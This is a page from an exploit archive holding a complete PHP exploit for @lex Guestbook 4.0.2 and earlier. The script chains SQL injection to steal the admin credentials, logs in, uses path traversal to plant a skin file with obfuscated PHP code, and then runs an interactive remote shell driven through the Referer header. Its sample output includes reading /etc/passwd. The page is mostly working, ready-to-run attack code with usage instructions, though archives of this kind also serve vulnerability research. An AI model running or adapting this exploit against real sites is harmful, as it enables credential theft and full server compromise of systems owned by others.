Bug: @lex Guestbook <= 4.0.2 Remote Command Execution Exploit ( Ascii Version )

Search:
WLB2

@lex Guestbook <= 4.0.2 Remote Command Execution Exploit

Published
Credit
Risk
2007.01.14
DarkFig
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0202
CVE-2007-0205
No
Yes

#!/usr/bin/php
<?php

/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");

/*/
|
| header> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit
| header> ========================================================
| status> Retrieving the administrator password
| sploit> AdminUsername::root
| sploit> AdminPassword::toor
| status> Trying to get logged in
| sploit> Done
| status> Trying to add a skin
| sploit> Done
| status> Writing the malicious skin
| $shell> whoami
| darkfig
|
| $shell> cat /etc/passwd ...
|
/*/

if($argc < 2)
{
print "n---------------------------------------------------------";
print "nAffected.scr..: @lex Guestbook <= 4.0.2"; // last version
print "nPoc.ID........: 20070107";
print "nType..........: PHP Code Execution";
print "nRisk.level....: High";
print "nSrc.download..: www.alexphpteam.com";
print "nPoc.link......: acid-root.new.fr/poc/20070107.txt";
print "nCredits.......: DarkFig";
print "n---------------------------------------------------------";
print "nUsage.........: php xpl.php <url>";
print "nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "nExample.......: php xpl.php http://victim.com/@lexgb/";
print "n---------------------------------------------------------n";
exit(1);
}

$url=$argv[1];
$prs=$argv[2];
$pra=$argv[3];

$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);

/*/
|
| index.php
| =========
| ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
|
|
| livre_include.php -> Local File Inclusion
| =================
| ... set_magic_quotes_runtime(0); // thx =)
| ... if (isset($_GET['lang']) && $_GET['lang'] &&
file_exists($chem_absolu."languages/".$_GET['lang'].".".$alex_livre_ext)
)
| $f_language = str_replace("..","",$_GET['lang']); // We can't use .... because of file_exists()
verification but ... =]
| include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
|
|
| index.php -> SQL Injection
| =========
| ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."'
and `type`='titre'");
| // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre`
|
/*/

$sql = "index.php?lang=english.php%00'%20union%20select%20".
"concat('XPLLogin:',(select%20login%20from%20alex_livr".
"e_users%20LIMIT%201),'XPLPass:',(select%20pass%20from".
"%20alex_livre_users%20LIMIT%201))/*";

print "nheader> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit";
print "nheader> ========================================================";
print "nstatus> Retrieving the administrator password";
$xpl->get($url.$sql);

if(preg_match('#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#',$xpl->getcontent(),$co
unt))
print "nsploit> AdminUsername::".$count[1]."nsploit> AdminPassword::".$count[2];
else die("nsploit> Exploit failed");

print "nstatus> Trying to get logged in";
$xpl->post($url."admin/index.php","f_login=".$count[1]."&f_pass=".$count
[2]."&f_identif=Identification");
if(preg_match("#f_cadres.php?f_sid=([a-z0-9]{32})#",$xpl->getheader(),
$sid)) print "nsploit> Done";
else die("nsploit> Exploit failed");

print "nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755)
$xpl->post($url."admin/skins.php?f_sid=".$sid[1],"aj_skin=../../language
s/d4h4x0rskin&ajouter=Ajouter");
if(!preg_match('#alert("ERREURn#',$xpl->getcontent())) print "nsploit> Done";
else die("nsploit> Exploit failed");

$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d).".
"chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).".
"chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).".
"chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45).".
"chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27).".
"chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52).".
"chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52).".
"chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)";

$data = "skin_edit=skins.php%3Ff_sid%3D".$sid[1]."%26skin_edit".
"%3D../../languages/d4h4x0rskin&alex_livre=<?phprn@e".
"val($scode);exit(0);rn?>&add_message=&nb_message_pa".
"ge=&list_pages=&corps_messages=&space=&assembly=&enre".
"gistrer=Enregistrer";

print "nstatus> Writing the malicious skinn$shell> ";
// skins.php ... write($chem_absolu."templates/skins/".$_GET['skin_edit']."/".$tab_templa
te_guestbook[$i])
$xpl->post($url."admin/skins.php?skin_edit=../../languages/d4h4x0rskin&f
_sid=".$sid[1],$data);

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
$xpl->addheader("Referer",$cmd);
$xpl->get($url."index.php?lang=d4h4x0rskin/alex_livre.css%00");
print $xpl->getcontent();
print "n$shell> ";
}

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version